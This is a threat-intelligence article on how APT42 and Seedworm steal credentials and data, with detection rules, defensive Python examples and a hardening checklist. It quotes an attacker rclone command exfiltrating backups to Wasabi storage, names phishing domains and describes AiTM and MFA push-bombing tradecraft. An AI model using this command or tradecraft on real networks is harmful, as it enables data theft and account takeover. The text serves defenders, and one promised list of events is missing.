In 2024, APT42 hacked into the Trump campaign, pulled out internal documents and tried to leak them to journalists. Without a single malicious attachment: no EXE, no macro, no PowerShell dropper, only social engineering and session interception. Seedworm (MuddyWater), according to public reports, allegedly sat persistently in the networks of a number of American organizations, with access established before the start of the military escalation in the region. Two Iranian APTs, two different agencies, one strategic goal: the accounts of the people who make decisions.
The figures confirm the trend: the CrowdStrike Global Threat Report 2025 says 75% of intrusions use valid credentials. IBM X-Force records a 71% year-over-year increase in such attacks. Iranian groups are among those shaping this trend.
Two mandates, one target: APT42 and Seedworm in Iranian cyber espionage
The confusion between Iranian APTs is a headache for analysts. APT42 and Seedworm work under different mandates with different kill chains, but aim at one result: access to other people's accounts and the intelligence inside them.

According to Google Cloud (Mandiant), APT42 targets specific people, chosen not by where they work but by who they know, what they know and whom they communicate with. The choice of victims reflects the intelligence needs of IRGC-IO: monitoring external threats to the Islamic Republic and suppressing dissent. In 2024, the DOJ indicted three individuals associated with the IRGC for cyber operations against election campaigns. The group continued to operate.
Seedworm, according to CISA, is a division of MOIS with a confirmed role as an initial access broker. According to public reports, Seedworm is believed to be building up its tooling: RustyWater (a Rust-based RAT) is mentioned, as well as abuse of the RMM tools Syncro and PDQ Connect installed on networks by third-party IT integrators. In other words, Seedworm comes in through software that your own contractor supplied.
For a SOC analyst, the difference in detection surface is fundamental. APT42 generates a minimum of artifacts on endpoints; its activity lands in cloud and proxy logs. Seedworm leaves footprints on hosts: signed backdoors, persistence through the registry, DNS tunneling. Alerts for the two groups come from different sources, and that requires different detection pipelines.
Credential harvesting kill chain: from the first email to compromising the cloud
Three clusters of APT42 phishing infrastructure and adversary-in-the-middle
According to the Google Cloud report, APT42 uses three infrastructure clusters. Cluster A is disguised as media outlets and think tanks: typosquatted domains like washinqtonpost[.]press, impersonating The Washington Post, The Economist, The Jerusalem Post and the Aspen Institute. The organizations themselves are not compromised; their names are used as a wrapper. Cluster B is disguised as legitimate services: Dropbox, Google Meet, YouTube. Its domains are strings of hyphenated words (panel-live-check[.]online, review[.]modification-check[.]online). Phishing pages are hosted on Google Sites, OneDrive and Cloudflare Workers, so the traffic blends with legitimate activity. Domain blocking is meaningless when the page lives on sites[.]google[.]com. Cluster C is tailored to generating MFA push notifications (T1621, Credential Access).
All three clusters share one pattern: a legitimate first contact through email, WhatsApp or Telegram -> weeks of building trust -> the phishing link. The first messages are clean: an invitation to comment on an article, a proposal to speak at a conference. No anti-phishing control will catch this, because there is nothing to catch. In MITRE ATT&CK terms: Impersonation (T1684, Defense Evasion) at the rapport-building stage, Phishing for Information: Spearphishing Link (T1598.003, Reconnaissance) at the stage of collecting data through trust, and Spearphishing Link (T1566.002, Initial Access) at the stage of delivering the final phishing link.
At the center of APT42's tradecraft is adversary-in-the-middle (AiTM), mapped to Multi-Factor Authentication Interception (T1111, Credential Access). The victim enters login, password and TOTP code on the cloned page. APT42's infrastructure instantly relays the data to the real service and intercepts the session cookies (T1539, Steal Web Session Cookie). For pentesters: the mechanics are one-to-one with EvilGinx2 or Modlishka, a reverse proxy between the victim and the legitimate service. The difference is APT42's custom phishing kits, regularly updated and not detected by public signatures. According to Mandiant, AiTM through a cloned site sometimes failed (the token had expired), after which the group switched to MFA push bombing (T1621): the operator initiates a real login and the victim approves the push notification. According to the Google Cloud report, the second method worked.
The only MFA category resistant to AiTM is FIDO2/passkeys. They are cryptographically bound to the domain origin: a phishing page on panel-live-check[.]online physically cannot obtain a response addressed to accounts.google.com. Everything else, TOTP, SMS, push, can be intercepted.
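Why the relay fails against FIDO2, as an added illustration that is not code from the article or from any vendor: the origins and rpId are the ones named above, the authenticator key is a constructed stand-in, and HMAC-SHA256 replaces the ECDSA signature a real authenticator produces (the origin and rpIdHash checks are the ones from the WebAuthn spec).

```python
# Added illustration (not code from the article or any vendor) of why an AiTM reverse
# proxy cannot relay a FIDO2/WebAuthn assertion. Origins and rpId come from the
# article; the authenticator key is a constructed stand-in and HMAC-SHA256 replaces the
# ECDSA signature a real authenticator would produce (the binding logic is unchanged).
import hashlib
import hmac
import json

LEGIT_RP_ID = "accounts.google.com"                 # rpId the passkey was registered for
LEGIT_ORIGIN = "https://accounts.google.com"
PHISH_ORIGIN = "https://panel-live-check.online"    # AiTM proxy from Cluster B
AUTHENTICATOR_KEY = b"constructed-passkey-secret"   # constructed; never leaves the device

def rp_id_valid_for_origin(rp_id: str, origin: str) -> bool:
    """Browser-side WebAuthn rule: rpId must be the origin's host or a registrable
    parent of it. A page on panel-live-check.online cannot even request a
    credential scoped to accounts.google.com."""
    host = origin.split("://", 1)[1].split("/", 1)[0].split(":", 1)[0]
    return host == rp_id or host.endswith("." + rp_id)

def authenticator_sign(rp_id: str, origin: str, challenge: str) -> dict:
    """Browser + authenticator: clientDataJSON carries the origin the *browser*
    observed, and the signature covers authenticatorData || SHA-256(clientDataJSON)."""
    if not rp_id_valid_for_origin(rp_id, origin):
        raise ValueError("browser refuses: rpId does not match origin")
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": origin}).encode()
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01"   # rpIdHash || flags
    signed = auth_data + hashlib.sha256(client_data).digest()
    sig = hmac.new(AUTHENTICATOR_KEY, signed, hashlib.sha256).digest()
    return {"clientDataJSON": client_data, "authenticatorData": auth_data, "signature": sig}

def relying_party_verify(assertion: dict, expected_challenge: str) -> bool:
    """Server-side checks from the WebAuthn spec: origin and rpIdHash must be the
    RP's own before the signature is even considered."""
    cd = json.loads(assertion["clientDataJSON"])
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != expected_challenge:
        return False
    if cd.get("origin") != LEGIT_ORIGIN:            # the origin-binding check
        return False
    if assertion["authenticatorData"][:32] != hashlib.sha256(LEGIT_RP_ID.encode()).digest():
        return False
    signed = assertion["authenticatorData"] + hashlib.sha256(assertion["clientDataJSON"]).digest()
    expected = hmac.new(AUTHENTICATOR_KEY, signed, hashlib.sha256).digest()
    return hmac.compare_digest(expected, assertion["signature"])

def legitimate_login(challenge: str = "c0ffee") -> bool:
    """Victim on the real site: the assertion verifies."""
    return relying_party_verify(authenticator_sign(LEGIT_RP_ID, LEGIT_ORIGIN, challenge), challenge)

def aitm_relay(challenge: str = "c0ffee") -> str:
    """Victim on the proxy. First the browser refuses the foreign rpId; if the proxy
    instead asks for a credential scoped to its own domain (a real authenticator would
    have none; we let it sign to show the server check), the RP rejects the origin."""
    try:
        authenticator_sign(LEGIT_RP_ID, PHISH_ORIGIN, challenge)
        return "relayed"                             # unreachable: browser refuses
    except ValueError:
        pass
    assertion = authenticator_sign("panel-live-check.online", PHISH_ORIGIN, challenge)
    return "accepted" if relying_party_verify(assertion, challenge) else "rejected by RP"
```

Contrast this with a TOTP code, which carries no origin at all and so verifies identically whether the victim typed it on accounts.google.com or on the proxy.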
After the session is intercepted: living off the cloud
After gaining access, APT42 works exclusively through the built-in features of the cloud services. MITRE ATT&CK: Cloud Accounts (T1078.004, Defense Evasion / Persistence), Remote Email Collection (T1114.002, Collection).
Documented behavior (Mandiant, Google Cloud):
• Registering their own MFA authenticator on the victim's account: persistence without malware
• Reading correspondence in Outlook, downloading documents from OneDrive and SharePoint
• Exfiltrating files through the victim's own OneDrive account, so the transfer looks like the victim's activity
• VPN and anonymizing infrastructure to mask the source
Not a single malicious file inside the cloud environment. EDR on the endpoint is useless. All the activity is in cloud logs. If you don't monitor the M365 Unified Audit Log with the same attention as the Windows Event Log, you're blind to this attack.
Seedworm 2026: Dindoor, Fakeset and compromised legitimate hosts
Unlike APT42, Seedworm traditionally relies on malware. But the 2026 campaign shows a move towards a hybrid model with elements of identity-based attack and abuse of cloud services.
According to Broadcom (Symantec), Seedworm has allegedly been found on the networks of a number of American organizations, including the financial sector, transport infrastructure and defense industry suppliers. Two backdoors, whose attribution requires independent verification:
Dindoor [requires verification]: according to Broadcom, uses the Deno runtime (JavaScript/TypeScript) for execution. Presumably signed with the "Amy Cherne" certificate. An interesting choice of runtime: Deno is still rare in malware, and most EDRs do not know how to interpret its behavior.
Fakeset [requires verification]: a Python backdoor. Presumably signed with the "Amy Cherne" and "Donald Gay" certificates. According to Broadcom, the Donald Gay certificate was previously used to sign malware presumably linked to Seedworm. Download: presumably from Backblaze servers.
Data exfiltration via Rclone to Wasabi cloud storage:
Bash:
rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[BUCKET]:/192.168.0.x
Key signal: according to Broadcom, Seedworm is presumed to have had access to the networks before the start of the military escalation in the region. Classic pre-positioning: compromised legitimate hosts that in peacetime look like normal infrastructure and do not generate alerts. According to CloudSEK, the initial access broker role means a Seedworm compromise can lead to another group appearing on the network later: Seedworm comes first and hands off access.
For the SOC this has a direct consequence: discovering Seedworm artifacts on a host is a reason to look for traces of other Iranian groups in cloud logs. One group is the entry point. The second may already be inside.
Detecting identity-based attacks by Iranian APTs in the SIEM
Cloud logs: correlation rules for M365 and Azure AD
For APT42, the main detection surface is cloud logs. Three critical events:
Proxy logs, email headers and Seedworm indicators
Characteristic APT42 patterns in proxy logs:
• POST requests to Google Sites with a redirect to domains on .top, .online, .site, .live
• URL shortener n9[.]cl with redirection to domains like admin-stable-right[.]top
• Requests to the Dropbox API to download PDF lures, followed by a transition to a phishing page
When analyzing email headers (MXToolbox, Email Header Analyzer): Return-Path does not match From, which indicates spoofing. X-Originating-IP points to a VPN or hosting provider, not the sender's mail server. SPF/DKIM/DMARC may pass: APT42 uses legitimate mail services for the first contact, which makes sender-reputation filtering useless.
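The same header review automated, as an added example not drawn from the article: the message is constructed (all domains use .example), and the map of known sender networks is an assumption standing in for the From domain's real MX/SPF records.

```python
# Added example (not from the article): automated versions of the header checks
# described above. The message is constructed (domains use .example), and the map of
# known sender networks is an assumption standing in for the From domain's real
# MX/SPF records; SPF passing for the relay domain is deliberately not treated as a pass.
import email
import ipaddress
import re
from email.utils import parseaddr

# Constructed sample in the style of an APT42 first-contact email.
SAMPLE_HEADERS = """\
Return-Path: <bounce@mailer-service.example>
Received: from mailer-service.example (mailer-service.example [203.0.113.10]) by mx.victim.example
X-Originating-IP: [198.51.100.77]
Authentication-Results: mx.victim.example; spf=pass smtp.mailfrom=mailer-service.example; dkim=pass
From: Think Tank Events <events@aspen-institute.example>
Subject: Invitation to comment on our latest article

(body omitted)
"""

# Assumption: networks that legitimately send mail for a claimed From domain.
KNOWN_SENDER_NETS = {"aspen-institute.example": [ipaddress.ip_network("192.0.2.0/24")]}

def domain_of(addr_header: str) -> str:
    return parseaddr(addr_header)[1].rsplit("@", 1)[-1].lower()

def spf_aligned(auth: str, from_dom: str) -> bool:
    """spf=pass only vouches for From if the envelope sender (smtp.mailfrom) is the
    same domain, which is the alignment DMARC demands."""
    if "spf=pass" not in auth:
        return False
    m = re.search(r"smtp\.mailfrom=([^\s;]+)", auth)
    return bool(m) and m.group(1).rsplit("@", 1)[-1].lower() == from_dom

def analyze(raw: str) -> dict:
    msg = email.message_from_string(raw)
    from_dom = domain_of(msg.get("From", ""))
    rp_dom = domain_of(msg.get("Return-Path", ""))
    xoip = (msg.get("X-Originating-IP") or "").strip("[] ")
    auth = msg.get("Authentication-Results", "")
    flags = []
    if rp_dom and rp_dom != from_dom:
        flags.append("return-path/from mismatch")           # spoofing signal
    if xoip:
        ip = ipaddress.ip_address(xoip)
        if not any(ip in n for n in KNOWN_SENDER_NETS.get(from_dom, [])):
            flags.append("originating IP is not a known mail server of the From domain")
    if "spf=pass" in auth and not spf_aligned(auth, from_dom):
        flags.append("spf pass covers the relay domain, not the From domain")
    return {"from_domain": from_dom, "return_path_domain": rp_dom,
            "flags": flags, "suspicious": bool(flags)}
```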
For Seedworm, the indicators are different and sit on hosts:
• Binaries signed with the "Amy Cherne" or "Donald Gay" certificates
• DNS queries with high-entropy subdomains (Mori backdoor, DNS tunneling)
• Telegram Bot API traffic from internal hosts (Small Sieve backdoor)
• Installation of Syncro or PDQ Connect without authorization
Hardening checklist: credential harvesting without malware
1. FIDO2/passkeys for all high-risk accounts. TOTP and push MFA do not protect against AiTM; this is not a recommendation, it is a fact
2. Conditional Access in Azure AD: block sign-ins from atypical IPs, require a compliant device
3. Alert on "User registered security info", correlated by IP and user agent
4. Audit OAuth app registrations weekly. Alert on new consent with the scope Mail.Read / Files.Read.All
5. Proxy rule: alert on the TLDs .top, .online, .site, .live in conjunction with POST to login forms
6. DMARC in reject mode for your own domain
7. Baseline MailItemsAccessed: normal mail reading volume for each user; without this baseline, rule 2 does not work
8. Monitoring of URL shorteners (n9[.]cl, bit.ly) with redirects to phishing domains
9. For Seedworm: alert on installation of RMM tools (Syncro, PDQ Connect, AnyDesk) without an IT ticket. Monitoring of DNS queries with high-entropy subdomains
10. Subscribe to IOC feeds on Iranian APTs (MISP CIRCL, Google TAG, CISA alerts). Automatic enrichment of alerts
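The high-entropy subdomain check from the Seedworm host indicators and from checklist item 9, worked as an added example (not from the article or any vendor): it scores constructed DNS query lines by label entropy and by the count of distinct subdomains per client and parent domain, since a tunnel encodes data into many unique names. The thresholds and the log format (ts client qname) are assumptions to tune against your own baseline.

```python
# Added example (not from the article): a scoring pass over constructed DNS query
# logs for the high-entropy subdomain pattern attributed above to Seedworm's DNS
# tunneling (Mori backdoor) and repeated in checklist item 9. Thresholds and the
# log format (ts client qname) are assumptions to tune against your own baseline.
import math
from collections import defaultdict

# Constructed sample: one client issuing many random-looking labels under one parent.
SAMPLE_DNS = """\
12:00:00 10.2.0.4 www.example.com
12:00:01 10.2.0.4 mail.example.com
12:00:02 10.2.0.8 7a3f9c1e2b4d6f8a0c.updates-cdn.example
12:00:02 10.2.0.8 f0e1d2c3b4a5968778.updates-cdn.example
12:00:03 10.2.0.8 19d8c7b6a5f4e3d2c1.updates-cdn.example
12:00:03 10.2.0.8 c2b3a4958677f8e9d0.updates-cdn.example
12:00:04 10.2.0.8 3e4d5c6b7a8990f1e2.updates-cdn.example
12:00:05 10.2.0.9 cdn.static-assets.example
"""

def shannon_entropy(s: str) -> float:
    """Bits per character; hex/base32-encoded tunnel labels score near 4, words near 2."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def split_name(qname: str):
    """Assumption: no public suffix list offline, so the last two labels are treated
    as the registered domain and everything before them as the data-carrying part."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def score_queries(log_text: str, entropy_threshold: float = 3.5, min_unique: int = 4) -> dict:
    """Return {(client, parent_domain): stats} for pairs that exceed both thresholds:
    high average label entropy AND many distinct subdomains under one parent."""
    seen = defaultdict(set)
    entropies = defaultdict(list)
    for line in log_text.strip().splitlines():
        _, client, qname = line.split()
        sub, parent = split_name(qname)
        if not sub:
            continue                      # bare registered domain, nothing to score
        seen[(client, parent)].add(sub)
        entropies[(client, parent)].append(shannon_entropy(sub.replace(".", "")))
    hits = {}
    for key, subs in seen.items():
        avg_ent = sum(entropies[key]) / len(entropies[key])
        if avg_ent >= entropy_threshold and len(subs) >= min_unique:
            hits[key] = {"unique_subdomains": len(subs), "avg_entropy": round(avg_ent, 2)}
    return hits
```

Legitimate CDNs also use hashed labels, so the distinct-subdomain count and a per-client baseline matter more than entropy alone.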
According to the Verizon DBIR 2025, 38% of breaches involve stolen credentials and 36% start with phishing. Identity-based attack is the main vector. Iranian groups show how it works in practice: from the first email to exfiltration without a single artifact on the host.
The main problem is not APT42 and not Seedworm. The problem is the detection architecture of most SOCs. Monitoring is built around endpoints and the perimeter. EDR catches malware, NGFW filters traffic. But when the attacker comes in with a stolen M365 session and works through the browser, neither the EDR nor the firewall will see it. The cloud logs will, and they are monitored with far less attention than the Windows Event Log.
Median detection time according to Mandiant M-Trends 2025 is 11 days. APT42 spends those days in the victim's cloud: reading mail, downloading documents from SharePoint, registering its own MFA authenticator. The SOC looks at the endpoints and sees silence.